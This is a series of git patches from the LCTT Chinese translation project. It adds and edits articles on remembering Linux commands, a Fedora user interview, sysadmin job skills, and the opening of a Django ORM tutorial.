+[Close](#){#spu-close} + +::: {#spu-title} +Please support the site +::: + +::: {#spu-msg-cont} +::: {#spu-msg} +By clicking any of these buttons you help our site to get better + +::: {.spu-button .spu-twitter} +[Follow Me](https://twitter.com/2daygeek){.twitter-follow-button} +::: + +::: {.spu-button .spu-facebook} +::: {#fb-root} +::: + +::: {.fb-like data-href="https://www.facebook.com/2daygeek" data-send="false" data-width="450" data-show-faces="true" data-layout="button_count"} +::: +::: + +::: {.spu-button .spu-google} +::: {.g-plusone data-callback="googleCB" data-onendinteraction="closeGoogle" data-recommendations="false" data-annotation="bubble" data-size="medium" data-href="https://www.google.com/+2daygeeks"} +::: +::: +::: + +::: {.step-clear} +::: +::: + +[]{#spu-timer} + +::: {#spu-bottom} +::: +::: + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds/ + +作者:[ ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + From bd08677cff363066d8616e6a0cb0a2507fd249be Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 11:25:25 +0800 Subject: [PATCH 0041/1627] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...7 How to Easily Remember Linux Commands.md | 20 +++++++++++++------ 1 file changed, 14 insertions(+), 6 deletions(-) diff --git a/translated/tech/20171117 How to Easily Remember Linux Commands.md b/translated/tech/20171117 How to Easily Remember Linux Commands.md index 8e4483cd20..16f4182e80 100644 --- a/translated/tech/20171117 How to Easily Remember Linux Commands.md +++ b/translated/tech/20171117 How to Easily Remember Linux Commands.md @@ -9,7 +9,7 @@ Linux 新手往往对命令行心存畏惧。部分原因是因为需要记忆 ![Linux Bash History 命令](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash-history.jpg) -首先要介绍的是命令行工具 history。它能帮你记住那些你曾经用过的命令。大多数 [Linux shells](https://www.maketecheasier.com/remember-linux-commands/),包括应用最广泛的 Bash,都会创建一个历史文件来包含那些你输入过的命令。如果你用的是 Bash,这个历史文件就是 "/home//.bash_history"。 +首先要介绍的是命令行工具 history。它能帮你记住那些你曾经用过的命令。大多数 [Linux shells][1],包括应用最广泛的 Bash,都会创建一个历史文件来包含那些你输入过的命令。如果你用的是 Bash,这个历史文件就是 "/home//.bash_history"。 这个历史文件是纯文本格式的,你可以用任意的文本编辑器打开来浏览和搜索。 ## Apropos @@ -36,7 +36,7 @@ Linux 新手往往对命令行心存畏惧。部分原因是因为需要记忆 ![Linux Apropos -a Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos-a.jpg) -你会觉得应该会有一些匹配的内容出现,比如 [grep](https://www.maketecheasier.com/remember-linux-commands/) 对吗? +你会觉得应该会有一些匹配的内容出现,比如 [grep][2] 对吗? 然而,实际上并没有匹配出任何结果。再说一次,apropos 只会根据字面内容进行搜索。 现在让我们试着用 `-a` 标志来把单词分割开来。 @@ -50,12 +50,12 @@ apropos 是一个很棒的工具,不过你需要留意它的缺陷。 ![Linux ZSH Autocomplete](https://www.maketecheasier.com/assets/uploads/2017/10/rc-zsh.jpg) -ZSH 其实并不是用于记忆命令的工具。它其实是一种 shell。你可以用 [ZSH](https://www.maketecheasier.com/remember-linux-commands/) 来替代 Bash 作为你的命令行 shell。ZSH 包含了自动纠错机制,能在你输入命令的时候给你予提示。 -开启该功能后,它会提示你相近的选择想面。在 ZSH 中你可以像往常一样使用命令行,同时你还能享受到极度安全的网络以及其他一些非常好用的特性。充分利用 ZSH 的最简单方法就是使用 [Oh-My-ZSH](https://www.maketecheasier.com/remember-linux-commands/)。 +ZSH 其实并不是用于记忆命令的工具。它其实是一种 shell。你可以用 [ZSH][3] 来替代 Bash 作为你的命令行 shell。ZSH 包含了自动纠错机制,能在你输入命令的时候给你予提示。 +开启该功能后,它会提示你相近的选择想面。在 ZSH 中你可以像往常一样使用命令行,同时你还能享受到极度安全的网络以及其他一些非常好用的特性。充分利用 ZSH 的最简单方法就是使用 [Oh-My-ZSH][4]。 ## Cheat Sheet -最后,也可能是最间的方法就是使用 [cheat sheet](https://www.maketecheasier.com/remember-linux-commands/)。 -有很多在线的 cheat sheet,比如[这个](https://www.maketecheasier.com/remember-linux-commands/) 可以帮助你快速查询命令。 +最后,也可能是最间的方法就是使用 [cheat sheet][5]。 +有很多在线的 cheat sheet,比如[这个][6] 可以帮助你快速查询命令。 ![linux-commandline-cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux-commandline-cheatsheet.gif) 为了快速查询,你可以寻找图片格式的 cheat sheet 然后将它设置为你的桌面墙纸。 @@ -72,3 +72,11 @@ via: https://www.maketecheasier.com/remember-linux-commands/ 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: https://www.maketecheasier.com/author/nickcongleton/ +[1]: https://www.maketecheasier.com/alternative-linux-shells/ +[2]: https://www.maketecheasier.com/what-is-grep-and-uses/ +[3]: https://www.maketecheasier.com/understanding-the-different-shell-in-linux-zsh-shell/ +[4]: https://github.com/robbyrussell/oh-my-zsh +[5]: https://www.maketecheasier.com/premium/cheatsheet/linux-command-line/ +[6]: https://www.cheatography.com/davechild/cheat-sheets/linux-command-line/ From 6522cd36e2e8f2f058de0db3efb630f9e7a79233 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Wed, 29 Nov 2017 00:14:42 -0500 Subject: [PATCH 0042/1627] =?UTF-8?q?yixunx=E8=AE=A4=E9=A2=86?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...170809 Designing a Microservices Architecture for Failure.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md b/sources/tech/20170809 Designing a Microservices Architecture for Failure.md index e1124c229c..3325aaf8da 100644 --- a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md +++ b/sources/tech/20170809 Designing a Microservices Architecture for Failure.md @@ -1,3 +1,5 @@ +yixunx翻译中 + Designing a Microservices Architecture for Failure ============================================================  From 571380a4670e688cf47d64355835418b45d7b841 Mon Sep 17 00:00:00 2001 From: HankChow Date: Wed, 29 Nov 2017 15:16:07 +0800 Subject: [PATCH 0043/1627] HankChow translating --- ...Measure Twice Compute Once with Xen Linux TPM 2.0 and TXT.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171010 In Device We Trust Measure Twice Compute Once with Xen Linux TPM 2.0 and TXT.md b/sources/tech/20171010 In Device We Trust Measure Twice Compute Once with Xen Linux TPM 2.0 and TXT.md index 20c14074c6..bc3e800452 100644 --- a/sources/tech/20171010 In Device We Trust Measure Twice Compute Once with Xen Linux TPM 2.0 and TXT.md +++ b/sources/tech/20171010 In Device We Trust Measure Twice Compute Once with Xen Linux TPM 2.0 and TXT.md @@ -1,3 +1,5 @@ +HankChow Translating + In Device We Trust: Measure Twice, Compute Once with Xen, Linux, TPM 2.0 and TXT ============================================================ From cd0d02a9aae43381e4cbdccd387e977fed8563fd Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 29 Nov 2017 15:29:20 +0800 Subject: [PATCH 0044/1627] PRF:20171117 How to Easily Remember Linux Commands.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 恭喜你,完成了第一篇翻译!可以参照我的校对了解格式惯例。 另外,其实以后有选题建议,可以将 URL 发 issue 给 项目,或者QQ 发给 选题-vim 。 --- ...7 How to Easily Remember Linux Commands.md | 62 +++++++++++-------- 1 file changed, 36 insertions(+), 26 deletions(-) diff --git a/translated/tech/20171117 How to Easily Remember Linux Commands.md b/translated/tech/20171117 How to Easily Remember Linux Commands.md index 16f4182e80..c408beb6e9 100644 --- a/translated/tech/20171117 How to Easily Remember Linux Commands.md +++ b/translated/tech/20171117 How to Easily Remember Linux Commands.md @@ -1,67 +1,77 @@ -# How to Easily Remember Linux Commands +如何轻松记住 Linux 命令 +================= ![](https://www.maketecheasier.com/assets/uploads/2017/10/rc-feat.jpg) +Linux 新手往往对命令行心存畏惧。部分原因是因为需要记忆大量的命令,毕竟掌握命令是高效使用命令行的前提。 -Linux 新手往往对命令行心存畏惧。部分原因是因为需要记忆大量的命令。毕竟掌握命令是高效使用命令行的前提。 不幸的是,学习这些命令并无捷径,然而在你开始学习命令之初,有些工具还是可以帮到你的。 -## History + +### history ![Linux Bash History 命令](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash-history.jpg) -首先要介绍的是命令行工具 history。它能帮你记住那些你曾经用过的命令。大多数 [Linux shells][1],包括应用最广泛的 Bash,都会创建一个历史文件来包含那些你输入过的命令。如果你用的是 Bash,这个历史文件就是 "/home//.bash_history"。 -这个历史文件是纯文本格式的,你可以用任意的文本编辑器打开来浏览和搜索。 -## Apropos +首先要介绍的是命令行工具 `history`,它能帮你记住那些你曾经用过的命令。包括应用最广泛的 Bash 在内的大多数 [Linux shell][1],都会创建一个历史文件来包含那些你输入过的命令。如果你用的是 Bash,这个历史文件就是 `/home//.bash_history`。 -确实存在有一个命令可以帮你找到其他命令。这个命令就是 "apropos",它能帮你找出合适的命令来完成你搜索的操作。比如,假设你需要知道哪个命令可以列出目录的内容,你可以运行下面命令: +这个历史文件是纯文本格式的,你可以用任意的文本编辑器打开来浏览和搜索。 + +### apropos + +确实存在一个可以帮你找到其他命令的命令。这个命令就是 `apropos`,它能帮你找出合适的命令来完成你的搜索。比如,假设你需要知道哪个命令可以列出目录的内容,你可以运行下面命令: ```shell - apropos "list directory" +apropos "list directory" ``` ![Linux Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos.jpg) -这就搜索出结果了。非常直接。给 "directory" 加上 "s" 后再试一下。 +这就搜索出结果了,非常直接。给 “directory” 加上复数后再试一下。 ```shell - apropos "list directories" +apropos "list directories" ``` 这次没用了。`apropos` 所作的其实就是搜索一系列命令的描述。描述不匹配的命令不会纳入结果中。 + 还有其他的用法。通过 `-a` 标志,你可以以更灵活的方式来增加搜索关键字。试试这条命令: ```shell - apropos "match pattern" +apropos "match pattern" ``` ![Linux Apropos -a Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos-a.jpg) -你会觉得应该会有一些匹配的内容出现,比如 [grep][2] 对吗? -然而,实际上并没有匹配出任何结果。再说一次,apropos 只会根据字面内容进行搜索。 -现在让我们试着用 `-a` 标志来把单词分割开来。 +你会觉得应该会有一些匹配的内容出现,比如 [grep][2] 对吗? 然而,实际上并没有匹配出任何结果。再说一次,apropos 只会根据字面内容进行搜索。 + +现在让我们试着用 `-a` 标志来把单词分割开来。(LCTT 译注:该选项的意思是“and”,即多个关键字都存在,但是不需要正好是连在一起的字符串。) ```shell - apropos "match" -a "pattern" +apropos "match" -a "pattern" ``` 这一下,你可以看到很多期望的结果了。 -apropos 是一个很棒的工具,不过你需要留意它的缺陷。 -## ZSH + +`apropos` 是一个很棒的工具,不过你需要留意它的缺陷。 + +### ZSH ![Linux ZSH Autocomplete](https://www.maketecheasier.com/assets/uploads/2017/10/rc-zsh.jpg) -ZSH 其实并不是用于记忆命令的工具。它其实是一种 shell。你可以用 [ZSH][3] 来替代 Bash 作为你的命令行 shell。ZSH 包含了自动纠错机制,能在你输入命令的时候给你予提示。 -开启该功能后,它会提示你相近的选择想面。在 ZSH 中你可以像往常一样使用命令行,同时你还能享受到极度安全的网络以及其他一些非常好用的特性。充分利用 ZSH 的最简单方法就是使用 [Oh-My-ZSH][4]。 -## Cheat Sheet +ZSH 其实并不是用于记忆命令的工具。它其实是一种 shell。你可以用 [ZSH][3] 来替代 Bash 作为你的命令行 shell。ZSH 包含了自动纠错机制,能在你输入命令的时候给你予提示。开启该功能后,它会提示你相近的选择。在 ZSH 中你可以像往常一样使用命令行,同时你还能享受到极度安全的网络以及其他一些非常好用的特性。充分利用 ZSH 的最简单方法就是使用 [Oh-My-ZSH][4]。 + +### 速记表 + +最后,也可能是最间的方法就是使用 [速记表][5]。 + +有很多在线的速记表,比如[这个][6] 可以帮助你快速查询命令。 -最后,也可能是最间的方法就是使用 [cheat sheet][5]。 -有很多在线的 cheat sheet,比如[这个][6] 可以帮助你快速查询命令。 ![linux-commandline-cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux-commandline-cheatsheet.gif) -为了快速查询,你可以寻找图片格式的 cheat sheet 然后将它设置为你的桌面墙纸。 +为了快速查询,你可以寻找图片格式的速记表,然后将它设置为你的桌面墙纸。 + 这并不是记忆命令的最好方法,但是这么做可以帮你节省在线搜索遗忘命令的时间。 -在学习时依赖这些方法,最终你会发现你会越来越少地使用这些工具。 -没有人能够记住所有的事情,因此偶尔遗忘掉某些东西或者遇到某些没有见过的东西也很正常。这也是这些工具以及因特网存在的意义。 + +在学习时依赖这些方法,最终你会发现你会越来越少地使用这些工具。没有人能够记住所有的事情,因此偶尔遗忘掉某些东西或者遇到某些没有见过的东西也很正常。这也是这些工具以及因特网存在的意义。 -------------------------------------------------------------------------------- @@ -69,7 +79,7 @@ via: https://www.maketecheasier.com/remember-linux-commands/ 作者:[Nick Congleton][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c8ca9f3cece6aefeac6acf4ca9fb9466d44f5fc6 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 29 Nov 2017 15:29:52 +0800 Subject: [PATCH 0045/1627] PUB:20171117 How to Easily Remember Linux Commands.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 文章地址:https://linux.cn/article-9093-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/lujun9972 --- .../20171117 How to Easily Remember Linux Commands.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171117 How to Easily Remember Linux Commands.md (100%) diff --git a/translated/tech/20171117 How to Easily Remember Linux Commands.md b/published/20171117 How to Easily Remember Linux Commands.md similarity index 100% rename from translated/tech/20171117 How to Easily Remember Linux Commands.md rename to published/20171117 How to Easily Remember Linux Commands.md From 1287cc2b185c4e37a9e159b3d1844e94a4b9f199 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 15:35:19 +0800 Subject: [PATCH 0046/1627] =?UTF-8?q?20171129-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0171120 Mark McIntyre How Do You Fedora.md | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 sources/tech/20171120 Mark McIntyre How Do You Fedora.md diff --git a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md new file mode 100644 index 0000000000..0788c67817 --- /dev/null +++ b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -0,0 +1,74 @@ +# [Mark McIntyre: How Do You Fedora?][1] + + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) + +We recently interviewed Mark McIntyre on how he uses Fedora. This is [part of a series][2] on the Fedora Magazine. The series profiles Fedora users and how they use Fedora to get things done. Contact us on the [feedback form][3] to express your interest in becoming a interviewee. + +### Who is Mark McIntyre? + +Mark McIntyre is a geek by birth and Linux by choice. “I started coding at the early age of 13 learning BASIC on my own and finding the excitement of programming which led me down a path of becoming a professional coder,” he says. McIntyre and his niece are big fans of pizza. “My niece and I started a quest last fall to try as many of the pizza joints in Knoxville. You can read about our progress at [https://knox-pizza-quest.blogspot.com/][4]” Mark is also an amateur photographer and [publishes his images][5] on Flickr. + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) + +Mark has a diverse background as a developer. He has worked with Visual Basic for Applications, LotusScript, Oracle’s PL/SQL, Tcl/Tk and Python with Django as the framework. His strongest skill is Python which he uses in his current job as a systems engineer. “I am using Python on a regular basis. As my job is morphing into more of an automation engineer, that became more frequent.” + +McIntyre is a self-described nerd and loves sci-fi movies, but his favorite movie falls out of that genre. “As much as I am a nerd and love the Star Trek and Star Wars and related movies, the movie Glory is probably my favorite of all time.” He also mentioned that Serenity was a fantastic follow-up to a great TV series. + +Mark values humility, knowledge and graciousness in others. He appreciates people who act based on understanding the situation that other people are in. “If you add a decision to serve another, you have the basis for someone you’d want to be around instead of someone who you have to tolerate.” + +McIntyre works for [Scripps Networks Interactive][6], which is the parent company for HGTV, Food Network, Travel Channel, DIY, GAC, and several other cable channels. “Currently, I function as a systems engineer for the non-linear video content, which is all the media purposed for online consumption.” He supports a few development teams who write applications to publish the linear video from cable TV into the online formats such as Amazon and Hulu. The systems include both on-premise and cloud systems. Mark also develops automation tools for deploying these applications primarily to a cloud infrastructure. + +### The Fedora community + +Mark describes the Fedora community as an active community filled with people who enjoy life as Fedora users. “From designers to packagers, this group is still very active and feels alive.” McIntyre continues, “That gives me a sense of confidence in the operating system.” + +He started frequenting the #fedora channel on IRC around 2002: “Back then, Wi-Fi functionality was still done a lot by hand in starting the adapter and configuring the modules.” In order to get his Wi-Fi working he had to recompile the Fedora kernel. Shortly after, he started helping others in the #fedora channel. + +McIntyre encourages others to get involved in the Fedora Community. “There are many different areas of opportunity in which to be involved. Front-end design, testing deployments, development, packaging of applications, and new technology implementation.” He recommends picking an area of interest and asking questions of that group. “There are many opportunities available to jump in to contribute.” + +He credits a fellow community member with helping him get started: “Ben Williams was very helpful in my first encounters with Fedora, helping me with some of my first installation rough patches in the #fedora support channel.” Ben also encouraged Mark to become an [Ambassador][7]. + +### What hardware and software? + +McIntyre uses Fedora Linux on all his laptops and desktops. On servers he chooses CentOS, due to the longer support lifecycle. His current desktop is self-built and equipped with an Intel Core i5 processor, 32 GB of RAM and 2 TB of disk space. “I have a 4K monitor attached which gives me plenty of room for viewing all my applications at once.” His current work laptop is a Dell Inspiron 2-in-1 13-inch laptop with 16 GB RAM and a 525 GB m.2 SSD. + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) + +Mark currently runs Fedora 26 on any box he setup in the past few months. When it comes to new versions he likes to avoid the rush when the version is officially released. “I usually try to get the latest version as soon as it goes gold, with the exception of one of my workstations running the next version’s beta when it is closer to release.” He usually upgrades in place: “The in-place upgrade using  _dnf system-upgrade_  works very well these days.” + +To handle his photography, McIntyre uses [GIMP][8] and [Darktable][9], along with a few other photo viewing and quick editing packages. When not using web-based email, he uses [Geary][10] along with [GNOME Calendar][11]. Mark’s IRC client of choice is [HexChat][12] connecting to a [ZNC bouncer][13]running on a Fedora Server instance. His department’s communication is handled via Slack. + +“I have never really been a big IDE fan, so I spend time in [vim][14] for most of my editing.” Occasionally, he opens up a simple text editor like [gedit][15] or [xed][16]. Mark uses [GPaste][17] for  copying and pasting. “I have become a big fan of [Tilix][18] for my terminal choice.” McIntyre manages the podcasts he likes with [Rhythmbox][19], and uses [Epiphany][20] for quick web lookups. + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/mark-mcintyre-fedora/ + +作者:[Charles Profitt][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org/author/cprofitt/ +[1]:https://fedoramagazine.org/mark-mcintyre-fedora/ +[2]:https://fedoramagazine.org/tag/how-do-you-fedora/ +[3]:https://fedoramagazine.org/submit-an-idea-or-tip/ +[4]:https://knox-pizza-quest.blogspot.com/ +[5]:https://www.flickr.com/photos/mockgeek/ +[6]:http://www.scrippsnetworksinteractive.com/ +[7]:https://fedoraproject.org/wiki/Ambassadors +[8]:https://www.gimp.org/ +[9]:http://www.darktable.org/ +[10]:https://wiki.gnome.org/Apps/Geary +[11]:https://wiki.gnome.org/Apps/Calendar +[12]:https://hexchat.github.io/ +[13]:https://wiki.znc.in/ZNC +[14]:http://www.vim.org/ +[15]:https://wiki.gnome.org/Apps/Gedit +[16]:https://github.com/linuxmint/xed +[17]:https://github.com/Keruspe/GPaste +[18]:https://fedoramagazine.org/try-tilix-new-terminal-emulator-fedora/ +[19]:https://wiki.gnome.org/Apps/Rhythmbox +[20]:https://wiki.gnome.org/Apps/Web From 07bdfd105551fa2f1f610640eb43356e74db92be Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 29 Nov 2017 15:42:39 +0800 Subject: [PATCH 0047/1627] Update 20171120 Mark McIntyre How Do You Fedora.md translating --- sources/tech/20171120 Mark McIntyre How Do You Fedora.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md index 0788c67817..bfd19e1eda 100644 --- a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md +++ b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -1,3 +1,4 @@ +translating by zrszrszrs # [Mark McIntyre: How Do You Fedora?][1] From 2a28e099bf212b6538e201f5aabe576b17961c24 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 15:52:28 +0800 Subject: [PATCH 0048/1627] =?UTF-8?q?20171129-2=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...and Certification Are Key for SysAdmins.md | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md diff --git a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md new file mode 100644 index 0000000000..e1237760b0 --- /dev/null +++ b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md @@ -0,0 +1,67 @@ +Open Source Cloud Skills and Certification Are Key for SysAdmins +============================================================ + + +![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") +Sysadmins with open source skills and certification can command higher pay, according to the 2017 Open Source Jobs Report.[Creative Commons Zero][1] + +System administrator is one of the most common positions employers are looking to fill among 53 percent of respondents to the [2017 Open Source Jobs Report][3]. Consequently, sysadmins with skills in engineering can command higher salaries, as these positions are among the hardest to fill, the report finds. + +Sysadmins are generally responsible for installing, supporting, and maintaining servers or other computer systems, and planning for and responding to service outages and other problems. + +Overall, this year’s report finds the skills most in demand are open source cloud (47 percent), application development (44 percent), Big Data (43 percent) and both DevOps and security (42 percent). + +The report also finds that 58 percent of hiring managers are planning to hire more open source professionals, and 67 percent say hiring of open source professionals will increase more than in other areas of the business. This represents a two-point increase over last year among employers who said open source hiring would be their top field of recruitment. + +At the same time, 89 percent of hiring managers report it is difficult to find open source talent. + +### Why get certified + +The desire for sysadmins is incentivizing hiring managers to offer formal training and/or certifications in the discipline in 53 percent of organizations, compared to 47 percent last year, the Open Source Jobs Report finds. + +IT professionals interested in sysadmin positions should consider Linux certifications. Searches on several of the more well-known job posting sites reveal that the [CompTIA Linux+][4]certification is the top certification for entry-level Linux sysadmin, while [Red Hat Certified Engineer (RHCE)][5] and [Red Hat Certified System Administrator (RHCSA)][6] are the main certifications for higher-level positions. + +In 2016, a sysadmin commanded a salary of $79,583, a change of -0.8 percent from the previous year, according to Dice’s [2017 Tech Salary Survey][7]. The systems architect position paid $125,946, a year-over-year change of -4.7 percent. Yet, the survey observes that “Highly skilled technology professionals remain in the most demand, especially those candidates proficient in the technologies needed to support industry transformation and growth.” + +When it comes to open source skills, HBase (an open-source distributed database), ranked as one that garners among the highest pay for tech pros in the Dice survey. In the networking and database category, the OpenVMS operating system ranked as another high-paying skill. + +### The sysadmin role + +One of a sysadmin’s responsibilities is to be available 24/7 when a problem occurs. The position calls for a mindset that is about “zero-blame, lean, iterative improvement in process or technology,’’ and one that is open to change, writes Paul English, a board member for the League of Professional System Administrators, a non-profit professional association for the advancement of the practice of system administration, in  [opensource.com][8]. He adds that being a sysadmin means “it’s almost a foregone conclusion that you’ll work with open source software like Linux, BSD, and even open source Solaris.” + +Today’s sysadmins will more often work with software rather than hardware, and should be prepared to write small scripts, according to English. + +### Outlook for 2018 + +Expect to see sysadmins among the tech professionals many employers in North America will be hiring in 2018, according to [Robert Half’s 2018 Salary Guide for Technology Professionals][9]. Increasingly, soft skills and leadership qualities are also highly valued. + +“Good listening and critical-thinking skills, which are essential to understanding and resolving customers’ issues and concerns, are important for almost any IT role today, but especially for help desk and desktop support professionals,’’ the report states. + +This jibes with some of the essential skills needed at various stages of the sysadmin position, including strong analytical skills and an ability to solve problems quickly, according to [The Linux Foundation][10]. + +Other skills sysadmins should have as they move up the ladder are: interest in structured approaches to system configuration management; experience in resolving security issues; experience with user identity management; ability to communicate in non-technical terms to non-technical people; and ability to modify system to meet new security requirements. + + _[Download ][11]the full 2017 Open Source Jobs Report now._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins + +作者:[ ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://www.linux.com/files/images/open-house-sysadminjpg +[3]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ +[4]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx +[5]:https://www.redhat.com/en/services/certification/rhce +[6]:https://www.redhat.com/en/services/certification/rhcsa +[7]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 +[8]:https://opensource.com/article/17/7/truth-about-sysadmins +[9]:https://www.roberthalf.com/salary-guide/technology +[10]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 +[11]:http://bit.ly/2017OSSjobsreport From add78733cecbb411156c8eb13c6118587932ac41 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 15:56:31 +0800 Subject: [PATCH 0049/1627] =?UTF-8?q?20171129-3=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...71124 An introduction to the Django ORM.md | 196 ++++++++++++++++++ 1 file changed, 196 insertions(+) create mode 100644 sources/tech/20171124 An introduction to the Django ORM.md diff --git a/sources/tech/20171124 An introduction to the Django ORM.md b/sources/tech/20171124 An introduction to the Django ORM.md new file mode 100644 index 0000000000..727df3f7b0 --- /dev/null +++ b/sources/tech/20171124 An introduction to the Django ORM.md @@ -0,0 +1,196 @@ +An introduction to the Django ORM +============================================================ + +### Learn how to use the Python web framework's object-relational mapper to interact with your database, just like you would with SQL. + + +![Getting to know the Django ORM](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/web-spider-frame-framework.png?itok=Rl2AG2Dc "Getting to know the Django ORM") +Image by : [Christian Holmér][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] + +You might have heard of [Django][12], the Python web framework for "perfectionists with deadlines." It's that one with the [cute pony][13]. + +One of the most powerful features of Django is its Object-Relational Mapper (ORM), which enables you to interact with your database, like you would with SQL. In fact, Django's ORM is just a pythonical way to create SQL to query and manipulate your database and get results in a pythonic fashion. Well, I say  _just_  a way, but it's actually really clever engineering that takes advantage of some of the more complex parts of Python to make developers' lives easier. + +Before we start looking into how the ORM works, we need a database to manipulate. As with any relational database, we need to define a bunch of tables and their relationships (i.e., the way they relate to each other). Let's use something familiar. For example, say we want to model a blog that has blog posts and authors. An author has a name. An author can have many blog posts. A blog post can have many authors and has a title, content, and a published date. + +In Django-ville, this concept of posts and authors could be called our Blog app. In this context, an app is a self-contained set of models and views that describes the behavior and functionality of our blog. Packaged in the right way, many Django projects could use our Blog app. In our project, the Blog could just be one app. We might also have a Forum app, for example. But we'll stick with the original scope of our Blog app. + +Here's a `models.py` prepared for this tutorial: + +``` +from django.db import models + +class Author(models.Model): +    name = models.CharField(max_length=100) + +    def __str__(self): +        return self.name + +class Post(models.Model): +    title = models.CharField(max_length=100) +    content = models.TextField() +    published_date = models.DateTimeField(blank=True, null=True) +    author = models.ManyToManyField(Author, related_name="posts") + +    def __str__(self): +        return self.title +``` + +More Python Resources + +* [What is Python?][1] + +* [Top Python IDEs][2] + +* [Top Python GUI frameworks][3] + +* [Latest Python content][4] + +* [More developer resources][5] + +Now this might look a bit daunting, so let's break it down. We have two models: Author and Post. Each has a name or title. The post has a big text field for content and a `DateTimeField` for the publication date and time. Post also has a `ManyToManyField`, which links posts and authors together. + +Most tutorials start from scratch—but that's not what's going to happen in practice. In reality, you're going to be given a bunch of existing code like the `model.py` above, and you have to work out what it all means. + +So it's now your task to go into the application and take a look around. There are a few ways to do this. You could log in to [Django admin][14], a web-based backend that has all the apps listed and the ways to manipulate them. We'll get back to that; here we're interested in the ORM. + +We can access the ORM by running `python 